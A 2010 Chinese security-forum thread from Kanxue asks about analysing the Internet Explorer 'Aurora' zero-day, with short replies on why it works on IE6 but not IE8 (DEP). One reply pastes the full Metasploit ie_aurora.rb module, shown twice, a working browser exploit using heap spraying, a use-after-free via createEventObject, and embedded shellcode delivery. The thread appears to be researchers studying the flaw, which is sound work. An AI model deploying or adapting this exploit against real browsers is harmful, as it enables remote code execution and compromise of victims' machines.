[讨论]做个调查，有分析IE最新极光0day漏洞的吗？-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

最新回复 (18)
youstar 雪币： 267 活跃值： (24) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 284 粉丝 0 关注私信	youstar 2 2010-1-19 08:56 2 楼 0 研究了下，不知道具体怎么分析，正学习中！
cater 雪币： 109 活跃值： (383) 能力值： ( LV12，RANK：220 ) 在线值：发帖 57 回帖 413 粉丝 2 关注私信	cater 5 2010-1-19 10:08 3 楼 0 ##看到HDM的这个可以确定了，世界又要开始新的一轮疯狂了 # $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. #http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, # no way to test without just trying it }) def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption', 'Description' => %q{ This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild. }, 'License' => MSF_LICENSE, 'Author' => [ 'unknown', 'hdm' # Metasploit port ], 'Version' => '$Revision: 8136 $', 'References' => [ ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'], ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { }], ], 'DisclosureDate' => 'Jan 14 2009', # wepawet sample 'DefaultTarget' => 0)) end def on_request_uri(cli, request) if (request.uri.match(/\.gif/i)) data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0] send_response(cli, data, { 'Content-Type' => 'image/gif' }) return end var_memory = rand_text_alpha(rand(100) + 1) var_boom = rand_text_alpha(rand(100) + 1) var_x1 = rand_text_alpha(rand(100) + 1) var_e1 = rand_text_alpha(rand(100) + 1) var_e2 = rand_text_alpha(rand(100) + 1) var_comment = rand_text_alpha(rand(100) + 1); var_abc = rand_text_alpha(3); var_ev1 = rand_text_alpha(rand(100) + 1) var_ev2 = rand_text_alpha(rand(100) + 1) var_sp1 = rand_text_alpha(rand(100) + 1) var_unescape = rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_spray = rand_text_alpha(rand(100) + 1) var_start = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) rand_html = rand_text_english(rand(400) + 500) html = %Q\|<html> <head> <script> var #{var_comment} = "COMMENT"; var #{var_x1} = new Array(); for (i = 0; i < 200; i ++ ){ #{var_x1} = document.createElement(#{var_comment}); #{var_x1}.data = "#{var_abc}"; }; var #{var_e1} = null; var #{var_memory} = new Array(); var #{var_unescape} = unescape; function #{var_boom}() { var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" ); do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 ); for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode}; } function #{var_ev1}(evt){ #{var_boom}(); #{var_e1} = document.createEventObject(evt); document.getElementById("#{var_sp1}").innerHTML = ""; window.setInterval(#{var_ev2}, 50); } function #{var_ev2}(){ p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d"; for (i = 0; i < #{var_x1}.length; i ++ ){ #{var_x1}.data = p; } var t = #{var_e1}.srcElement; } </script> </head> <body> <span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html> </body> </html> \| # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end end
yiyiguxing 雪币： 70 活跃值： (64) 能力值： ( LV4，RANK：50 ) 在线值：发帖 34 回帖 258 粉丝 0 关注私信	yiyiguxing 1 2010-1-19 11:13 4 楼 0 这个洞，IE6可以，但是IE8不行，看了一下，出错地址都一样，但是IE8不可控，但是IE6却可控（调用srcElement里面的一个对象虚函数时，这个虚函数被名字eventobj覆盖了，可控），跟IE8里面的堆分配机制好像有关
仙果雪币： 1489 活跃值： (955) 能力值： (RANK：860 ) 在线值：发帖 66 回帖 1509 粉丝 61 关注私信	仙果 19 2010-1-19 11:32 5 楼 0 据曝可以在IE8下使用，不知道真的假的需要求证下忙完了手上的工作就开始分析此漏洞
yiyiguxing 雪币： 70 活跃值： (64) 能力值： ( LV4，RANK：50 ) 在线值：发帖 34 回帖 258 粉丝 0 关注私信	yiyiguxing 1 2010-1-19 14:33 6 楼 0 看一篇报道说IE7/8不能利用，只是D.O.S，不知道真假，我目前还没研究出来怎么利用
youstar 雪币： 267 活跃值： (24) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 284 粉丝 0 关注私信	youstar 2 2010-1-19 15:12 7 楼 0 报的是IE系列和windows系列都可以，但是放出来的只有IE6可以！给个链接：http://securitylabs.websense.com/content/Blogs/3530.aspx 有个简单的分析！
仙果雪币： 1489 活跃值： (955) 能力值： (RANK：860 ) 在线值：发帖 66 回帖 1509 粉丝 61 关注私信	仙果 19 2010-1-19 16:25 8 楼 0 生成器都已经出来了。。 **人才辈出啊。。哇哈哈
frozenrain 雪币： 107 活跃值： (1437) 能力值： ( LV6，RANK：80 ) 在线值：发帖 26 回帖 506 粉丝 1 关注私信	frozenrain 2010-1-19 17:06 9 楼 0 老外文章说了，IE8没挂是因为开启了DEP。贝壳出的一个补丁实际上是开启IE DEP，可惜IE6好像没有DEP，所以对IE6无效。
仙果雪币： 1489 活跃值： (955) 能力值： (RANK：860 ) 在线值：发帖 66 回帖 1509 粉丝 61 关注私信	仙果 19 2010-1-20 09:59 10 楼 0 还好我用的是IE8 下个星期换回IE7试下
skybright 雪币： 58 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 55 粉丝 0 关注私信	skybright 2010-1-20 10:48 11 楼 0 好像目前就在IE6下可以
notmorw 雪币： 52 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 51 粉丝 0 关注私信	notmorw 2010-1-22 02:39 12 楼 0 顶上去留着学习
曾晨曦雪币： 44 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 90 粉丝 0 关注私信	曾晨曦 2010-1-22 06:50 13 楼 0 IE8没挂是因为开启了DEP。顶上去留着学习
webwizard 雪币： 29 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 310 粉丝 0 关注私信	webwizard 2010-1-22 13:59 14 楼 0 标记一下慢慢看
webwizard 雪币： 29 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 310 粉丝 0 关注私信	webwizard 2010-1-22 14:18 15 楼 0 LS的代码是什么格式的？怎么这么乱？
scz 雪币： 4111 活跃值： (3102) 能力值： ( LV12，RANK：230 ) 在线值：发帖 11 回帖 236 粉丝 60 关注私信	scz 5 2010-1-22 16:39 16 楼 0 metasploit的插件，ruby代码。
xixuegui 雪币： 73 活跃值： (70) 能力值： ( LV3，RANK：20 ) 在线值：发帖 13 回帖 78 粉丝 0 关注私信	xixuegui 2010-1-22 17:17 17 楼 0 还没到这种分析漏洞的地步不过一定会跟随大师学习大师洞察大师最后成为大师。
youstar 雪币： 267 活跃值： (24) 能力值： ( LV8，RANK：130 ) 在线值：发帖 16 回帖 284 粉丝 0 关注私信	youstar 2 2010-1-22 18:54 18 楼 0 Metasploit 里面的！
天涯一鸿雪币： 1052 活跃值： (1033) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 442 粉丝 0 关注私信	天涯一鸿 2010-1-24 23:29 19 楼 0 用ie7貌似照样运行了病毒好象是有几率的
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

youstar

雪币： 267

活跃值： (24)

能力值：

( LV8，RANK：130 )

在线值：

发帖

16

回帖

284

粉丝

0

关注

私信

youstar 2 2010-1-19 08:56: 2 楼
0

研究了下，不知道具体怎么分析，正学习中！

cater

雪币： 109

活跃值： (383)

能力值：

( LV12，RANK：220 )

在线值：

发帖

57

回帖

413

粉丝

2

关注

私信

cater 5 2010-1-19 10:08: 3 楼
0

##看到HDM的这个可以确定了 ，世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = NormalRanking

        include Msf::Exploit::Remote::HttpServer::HTML
        include Msf::Exploit::Remote::BrowserAutopwn
        autopwn_info({
                :ua_name    => HttpClients::IE,
                :ua_minver  => "6.0",
                :ua_maxver  => "8.0",
                :javascript => true,
                :os_name    => OperatingSystems::WINDOWS,
                :vuln_test  => nil, # no way to test without just trying it
        })


        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
                        'Description'    => %q{
                                This module exploits a memory corruption flaw in Internet Explorer. This
                        flaw was found in the wild.
                        },
                        'License'        => MSF_LICENSE,
                        'Author'         =>
                                [
                                        'unknown',
                                        'hdm'      # Metasploit port
                                ],
                        'Version'        => '$Revision: 8136 $',
                        'References'     =>
                                [
                                        ['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
                                        ['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']

                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "\x00",
                                        'Compat'   =>
                                                {
                                                        'ConnectionType' => '-find',
                                                },
                                        'StackAdjustment' => -3500,
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [ 'Automatic', { }],
                                ],
                        'DisclosureDate' => 'Jan 14 2009', # wepawet sample
                        'DefaultTarget'  => 0))
        end

        def on_request_uri(cli, request)

                if (request.uri.match(/\.gif/i))
                        data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
                        send_response(cli, data, { 'Content-Type' => 'image/gif' })
                        return
                end

                var_memory    = rand_text_alpha(rand(100) + 1)
                var_boom      = rand_text_alpha(rand(100) + 1)
                var_x1        = rand_text_alpha(rand(100) + 1)
                var_e1        = rand_text_alpha(rand(100) + 1)
                var_e2        = rand_text_alpha(rand(100) + 1)

                var_comment   = rand_text_alpha(rand(100) + 1);
                var_abc       = rand_text_alpha(3);

                var_ev1       = rand_text_alpha(rand(100) + 1)
                var_ev2       = rand_text_alpha(rand(100) + 1)
                var_sp1       = rand_text_alpha(rand(100) + 1)

                var_unescape  = rand_text_alpha(rand(100) + 1)
                var_shellcode = rand_text_alpha(rand(100) + 1)
                var_spray     = rand_text_alpha(rand(100) + 1)
                var_start     = rand_text_alpha(rand(100) + 1)
                var_i         = rand_text_alpha(rand(100) + 1)

                rand_html     = rand_text_english(rand(400) + 500)

                html = %Q|<html>
<head>
<script>

        var #{var_comment} = "COMMENT";

        var #{var_x1} = new Array();
        for (i = 0; i < 200; i ++ ){
           #{var_x1} = document.createElement(#{var_comment});
           #{var_x1}.data = "#{var_abc}";
        };

        var #{var_e1} = null;

        var #{var_memory} = new Array();
        var #{var_unescape} = unescape;

        function #{var_boom}() {

                var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');

                var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );

                do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );

                for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
        }

        function #{var_ev1}(evt){
                #{var_boom}();
            #{var_e1} = document.createEventObject(evt);
            document.getElementById("#{var_sp1}").innerHTML = "";
            window.setInterval(#{var_ev2}, 50);
        }

        function #{var_ev2}(){
          p = "\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
          for (i = 0; i < #{var_x1}.length; i ++ ){
              #{var_x1}.data = p;
          }

          var t = #{var_e1}.srcElement;
        }
</script>
</head>
<body>

<span id="#{var_sp1}"><img src="#{get_resource}#{var_start}.gif" onload="#{var_ev1}(event)"></span></body></html>

</body>
</html>
                |

                # Transmit the compressed response to the client
                send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })

                # Handle the payload
                handler(cli)
        end
end